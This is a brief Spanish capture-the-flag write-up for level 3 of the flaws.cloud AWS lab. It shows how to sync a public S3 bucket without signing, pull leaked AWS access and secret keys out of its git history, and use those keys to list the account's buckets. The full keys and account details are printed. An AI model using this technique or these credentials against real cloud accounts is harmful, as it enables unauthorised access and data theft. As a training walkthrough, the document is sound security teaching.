Level 3
#aws #s3 #bucket #infodisclosure #writeup
http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/
Hay directory listing:
http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud.s3.amazonaws.com/
Parece que hay un .git
Para descargarse todo el bucket
bash
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2bash
git log
git diff b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 f52ec03b227ea6094b04e43f475fb0126edb5a61+access_key AKIAJ366LIPB4IJKT7SA
+secret_access_key OdNa7m+bqUvF3Bn/qgSnPE1kBpqcBTTjqwP83JysAccess Key -> nombre de usuario , identifica a un usuario o rol.
Secret Access Key -> Se usan para interactuar con la cuenta desde la línea de comandos
bash
aws configure --profile ctfbash
aws sts get-caller-identity --profile ctfjson
{
"UserId": "AIDAJQ3H5DC3LEG2BKSLC",
"Account": "975426262029",
"Arn": "arn:aws:iam::975426262029:user/backup"
}bash
aws s3 ls --profile ctfListamos el bucket del siguiente nivel